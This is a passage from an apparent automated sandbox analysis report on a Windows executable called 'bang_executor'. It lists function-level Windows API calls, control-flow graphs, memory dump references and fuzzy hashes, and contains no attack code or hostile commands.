                                        • SHGetMalloc.SHELL32(0052C460), ref: 004FCD33
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                        • String ID: riched20.dll$3To
                                        • API String ID: 3498096277-2168385784
                                        • Opcode ID: b886fb1605cad97c7633602491039a9874b6ae57549cbb8deff35f4c2eb71e52
                                        • Instruction ID: 61408213aa80722c6cb84f372c92f80c1c028a22758232cd0e65d79b14bae059
                                        • Opcode Fuzzy Hash: b886fb1605cad97c7633602491039a9874b6ae57549cbb8deff35f4c2eb71e52
                                        • Instruction Fuzzy Hash: BAF049B5D0020DABCB10AF9AD8499EFFFFCEF95704F00405AE405A2241CBB856498FA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        control_flow_graph 1063 4eb2b0-4eb2ea call 501590 1066 4eb2ec-4eb2ef 1063->1066 1067 4eb2f5 1063->1067 1066->1067 1068 4eb2f1-4eb2f3 1066->1068 1069 4eb2f7-4eb308 1067->1069 1068->1069 1070 4eb30a 1069->1070 1071 4eb310-4eb31a 1069->1071 1070->1071 1072 4eb31f-4eb32c call 4e7eed 1071->1072 1073 4eb31c 1071->1073 1076 4eb32e 1072->1076 1077 4eb334-4eb34d CreateFileW 1072->1077 1073->1072 1076->1077 1078 4eb34f-4eb36e GetLastError call 4eda1e 1077->1078 1079 4eb39b-4eb39f 1077->1079 1083 4eb3a8-4eb3ad 1078->1083 1085 4eb370-4eb393 CreateFileW GetLastError 1078->1085 1081 4eb3a3-4eb3a6 1079->1081 1081->1083 1084 4eb3b9-4eb3be 1081->1084 1083->1084 1086 4eb3af 1083->1086 1087 4eb3df-4eb3f0 1084->1087 1088 4eb3c0-4eb3c3 1084->1088 1085->1081 1089 4eb395-4eb399 1085->1089 1086->1084 1091 4eb40b-4eb424 call 5010f9 1087->1091 1092 4eb3f2-4eb407 call 4f268b 1087->1092 1088->1087 1090 4eb3c5-4eb3d9 SetFileTime 1088->1090 1089->1081 1090->1087 1092->1091
                                        APIs
                                        • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,004E8846,?,00000005), ref: 004EB342
                                        • GetLastError.KERNEL32(?,?,004E8846,?,00000005), ref: 004EB34F
                                        • CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,004E8846,?,00000005), ref: 004EB382
                                        • GetLastError.KERNEL32(?,?,004E8846,?,00000005), ref: 004EB38A
                                        • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,004E8846,?,00000005), ref: 004EB3D9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: File$CreateErrorLast$Time
                                        • String ID:
                                        • API String ID: 1999340476-0
                                        • Opcode ID: 75cba299c376ba9872c2e4ecb1be14a7a9f73140ef36904b8e28a1be04622079
                                        • Instruction ID: b5efa7b19048606311dbf6804461c6df09e759f40f2a4903aef5d7f44a6bc7fe
                                        • Opcode Fuzzy Hash: 75cba299c376ba9872c2e4ecb1be14a7a9f73140ef36904b8e28a1be04622079
                                        • Instruction Fuzzy Hash: 544125305057856FD320DF25CC4A7EBBBD4FB48321F100A1AF9A1962C0D3B8A948CBDA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        control_flow_graph 1139 4fd864-4fd87d PeekMessageW 1140 4fd87f-4fd893 GetMessageW 1139->1140 1141 4fd8b8-4fd8ba 1139->1141 1142 4fd895-4fd8a2 IsDialogMessageW 1140->1142 1143 4fd8a4-4fd8b2 TranslateMessage DispatchMessageW 1140->1143 1142->1141 1142->1143 1143->1141
                                        APIs
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004FD875
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004FD886
                                        • IsDialogMessageW.USER32(0001045C,?), ref: 004FD89A
                                        • TranslateMessage.USER32(?), ref: 004FD8A8
                                        • DispatchMessageW.USER32(?), ref: 004FD8B2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Message$DialogDispatchPeekTranslate
                                        • String ID:
                                        • API String ID: 1266772231-0
                                        • Opcode ID: d225f370ec18b39752bf4b8c13a4515a7ebbffbc1afc122338d4d45ba34c3e46
                                        • Instruction ID: 12a0c700adff7064f1fcbfb0f73fb03b5a16404c1c3abfe5bc303c85f777491d
                                        • Opcode Fuzzy Hash: d225f370ec18b39752bf4b8c13a4515a7ebbffbc1afc122338d4d45ba34c3e46
                                        • Instruction Fuzzy Hash: A8F03075D0221DABDF20ABE5DC0CDEB7F7CEE1A2957004411B61AD2100E728D509CBF0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        control_flow_graph 1144 4fcb49-4fcb72 GetClassNameW 1145 4fcb9a-4fcb9c 1144->1145 1146 4fcb74-4fcb89 call 4f4168 1144->1146 1147 4fcb9e-4fcba1 SHAutoComplete 1145->1147 1148 4fcba7-4fcbb3 call 5010f9 1145->1148 1152 4fcb8b-4fcb97 FindWindowExW 1146->1152 1153 4fcb99 1146->1153 1147->1148 1152->1153 1153->1145
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000050), ref: 004FCB6A
                                        • SHAutoComplete.SHLWAPI(?,00000010), ref: 004FCBA1
                                          • Part of subcall function 004F4168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,004EE084,00000000,.exe,?,?,00000800,?,?,?,004FAD5D), ref: 004F417E
                                        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 004FCB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                        • String ID: EDIT
                                        • API String ID: 4243998846-3080729518
                                        • Opcode ID: 61656ac2ecd7468a41587d7190948e5049809a6ca87129f7937e264fc6bb5bb6
                                        • Instruction ID: 45bd3bc4911aef529c51211d63e76871b1c952f6acd6de24a5716ad630dda5d7
                                        • Opcode Fuzzy Hash: 61656ac2ecd7468a41587d7190948e5049809a6ca87129f7937e264fc6bb5bb6
                                        • Instruction Fuzzy Hash: 27F0CD3560131CBBD7209B259D0AFAF77AC9F9A704F000055BA45B7180D774EE498569
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 004FFFFE
                                        • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00500038
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: EnvironmentVariable
                                        • String ID: sfxcmd$sfxpar
                                        • API String ID: 1431749950-3493335439
                                        • Opcode ID: ed49217af4a244d42a1a602647f7b9a5da8e2cc0fd0dcb5128dd67f17800b928
                                        • Instruction ID: 9b8752be4a3cbff9727eaa8046ba1617d20074ac38ce711b773455e0040693d9
                                        • Opcode Fuzzy Hash: ed49217af4a244d42a1a602647f7b9a5da8e2cc0fd0dcb5128dd67f17800b928
                                        • Instruction Fuzzy Hash: ECF0F671901238BBD720ABA08C1AAFF7B9CFF1DB40B40441ABD41971C1DAF49D80DAA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000011,00000000,00000800,?,005061E3,00000000,00000001,005460C8,?,?,?,00506386,00000004,InitializeCriticalSectionEx,00519624,InitializeCriticalSectionEx), ref: 0050623F
                                        • GetLastError.KERNEL32(?,005061E3,00000000,00000001,005460C8,?,?,?,00506386,00000004,InitializeCriticalSectionEx,00519624,InitializeCriticalSectionEx,00000000,?,0050613D), ref: 00506249
                                        • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00505083), ref: 00506271
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID: api-ms-
                                        • API String ID: 3177248105-2084034818
                                        • Opcode ID: ee6dbbccdfaf30161d07b4101724f9c74f51118d2ab6e3c9966222ee4a3b3610
                                        • Instruction ID: c0617a810757b006a5d05b8f024eaf8ed1003f37b37f97d3617bcd37f4130195
                                        • Opcode Fuzzy Hash: ee6dbbccdfaf30161d07b4101724f9c74f51118d2ab6e3c9966222ee4a3b3610
                                        • Instruction Fuzzy Hash: 86E04F38680305B7EF101F60EC0AF9D3F69BF10B51F108420F91DA80E1EBB199A4A585
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,004EB662,?,?,00000000,?,?), ref: 004EB161
                                        • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,004EB662,?,?,00000000,?,?), ref: 004EB179
                                        • GetLastError.KERNEL32(?,?,?,00000000,004EB662,?,?,00000000,?,?), ref: 004EB1AB
                                        • GetLastError.KERNEL32(?,?,?,00000000,004EB662,?,?,00000000,?,?), ref: 004EB1CA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ErrorLast$FileHandleRead
                                        • String ID:
                                        • API String ID: 2244327787-0
                                        • Opcode ID: 4b26ca64f6c392af4c518982f699d3fdcdaefe91ce7f175bcfa748ea7db509b2
                                        • Instruction ID: c3275bdb2e458408e6e672b33c1dc746dcb32a9255ad8473b4e057e6c5f955b1
                                        • Opcode Fuzzy Hash: 4b26ca64f6c392af4c518982f699d3fdcdaefe91ce7f175bcfa748ea7db509b2
                                        • Instruction Fuzzy Hash: FA11A330500244EBDB219B22CC1866BB7A9FB553F3F10862BE85685290DB78DE44DBD9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,0050688D,00000000,00000000,?,0050D32B,0050688D,00000000,00000000,00000000,?,0050D528,00000006,FlsSetValue), ref: 0050D3B6
                                        • GetLastError.KERNEL32(?,0050D32B,0050688D,00000000,00000000,00000000,?,0050D528,00000006,FlsSetValue,0051AC00,FlsSetValue,00000000,00000364,?,0050BA77), ref: 0050D3C2
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0050D32B,0050688D,00000000,00000000,00000000,?,0050D528,00000006,FlsSetValue,0051AC00,FlsSetValue,00000000), ref: 0050D3D0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: 8ad3c801757d610e8f4897a1b63dcdf627e412d22c5135e3869f3b98e5d6b800
                                        • Instruction ID: b35ddd27a064b46fd87cd6eb33c951d0380546e1d078ee745683a5a0f722f8b8
                                        • Opcode Fuzzy Hash: 8ad3c801757d610e8f4897a1b63dcdf627e412d22c5135e3869f3b98e5d6b800
                                        • Instruction Fuzzy Hash: F101A736651326ABCB218FA9AC44ADB7F68FF157A17154E20F91BD71C0DB20D805CAF1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 0050B9A5: GetLastError.KERNEL32(?,005250C4,00506E12,005250C4,?,?,0050688D,?,?,005250C4), ref: 0050B9A9
                                          • Part of subcall function 0050B9A5: _free.LIBCMT ref: 0050B9DC
                                          • Part of subcall function 0050B9A5: SetLastError.KERNEL32(00000000,?,005250C4), ref: 0050BA1D
                                          • Part of subcall function 0050B9A5: _abort.LIBCMT ref: 0050BA23
                                          • Part of subcall function 0050E19E: _abort.LIBCMT ref: 0050E1D0
                                          • Part of subcall function 0050E19E: _free.LIBCMT ref: 0050E204
                                          • Part of subcall function 0050DE0B: GetOEMCP.KERNEL32(00000000,?,?,0050E094,?), ref: 0050DE36
                                        • _free.LIBCMT ref: 0050E0EF
                                        • _free.LIBCMT ref: 0050E125
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _free$ErrorLast_abort
                                        • String ID: p,R
                                        • API String ID: 2991157371-400878132
                                        • Opcode ID: 27c9dd83f49aeefaa2dbf487e799e549a984cacc454650ea1d20d8c4166f25f0
                                        • Instruction ID: 81ba2615a3443463c1c8e191861781356161db55e66718c62e58c41e407c0a65
                                        • Opcode Fuzzy Hash: 27c9dd83f49aeefaa2dbf487e799e549a984cacc454650ea1d20d8c4166f25f0
                                        • Instruction Fuzzy Hash: 6431A431904209AFEB10EFA9D48AAAD7FF5FF81320F354499E5049B2D1DBB25D41DB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateThread.KERNELBASE(00000000,00010000,Function_00013240,?,00000000,?), ref: 004F3129
                                        • SetThreadPriority.KERNEL32(00000000,00000000), ref: 004F3170
                                          • Part of subcall function 004E7BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004E7BD5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Thread$CreatePriority__vswprintf_c_l
                                        • String ID: CreateThread failed
                                        • API String ID: 2655393344-3849766595
                                        • Opcode ID: e0a1cae6a8351b25cd0cb796b09b656815c886b19504efd0903d0d279e135d3d
                                        • Instruction ID: 98f5de1dcd8758cf9b3d0c44bc6ae0f24583feec416e0aed6d90867d6357acd5
                                        • Opcode Fuzzy Hash: e0a1cae6a8351b25cd0cb796b09b656815c886b19504efd0903d0d279e135d3d
                                        • Instruction Fuzzy Hash: DC01F27224870A6FD2206F51AC45FB677E8EF52727F20012EF782561C1DAA0A8458668
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 0050E580: GetEnvironmentStringsW.KERNEL32 ref: 0050E589
                                          • Part of subcall function 0050E580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0050E5AC
                                          • Part of subcall function 0050E580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0050E5D2
                                          • Part of subcall function 0050E580: _free.LIBCMT ref: 0050E5E5
                                          • Part of subcall function 0050E580: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0050E5F4
                                        • _free.LIBCMT ref: 0050AB00
                                        • _free.LIBCMT ref: 0050AB07
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                        • String ID: pbT
                                        • API String ID: 400815659-2424122762
                                        • Opcode ID: 0d7a5f4efb6df45523e249a137bff5fccf166aa9969af96af321d944d831011d
                                        • Instruction ID: 9b0675e34fdd588cad0721b22aeb1e9b0375146dda301bfcc9b9bc25161e47cb
                                        • Opcode Fuzzy Hash: 0d7a5f4efb6df45523e249a137bff5fccf166aa9969af96af321d944d831011d
                                        • Instruction Fuzzy Hash: D6E0E526B0960365E66176BE6D4BFDE1E557BC2335B200A15F825861C2DE9088055093
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetStdHandle.KERNEL32(000000F5,?,?,?,?,004EF306,00000001,?,?,?,00000000,004F7564,?,?,?,?), ref: 004EB9DE
                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004EBA25
                                        • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,004EF306,00000001,?,?,?), ref: 004EBA51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: FileWrite$Handle
                                        • String ID:
                                        • API String ID: 4209713984-0
                                        • Opcode ID: b249deaf58b5bdc2890773596a9df77840271f70f4f86388828486d506b13581
                                        • Instruction ID: 9e380cf33cd89876c44cee80257c9ac2e7eb3e5c0fc2fb8121781c74a040ef2c
                                        • Opcode Fuzzy Hash: b249deaf58b5bdc2890773596a9df77840271f70f4f86388828486d506b13581
                                        • Instruction Fuzzy Hash: 8D31A271208385AFDF14CF15D848BAB77A5FB81716F044A2EF58157290CB789D48CBE6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 004EE1EC: _wcslen.LIBCMT ref: 004EE1F2
                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,?,00000000,004EBBD0,?,00000001,00000000,?,?), ref: 004EBF12
                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,00000000,004EBBD0,?,00000001,00000000,?,?), ref: 004EBF45
                                        • GetLastError.KERNEL32(?,?,?,00000000,004EBBD0,?,00000001,00000000,?,?), ref: 004EBF62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
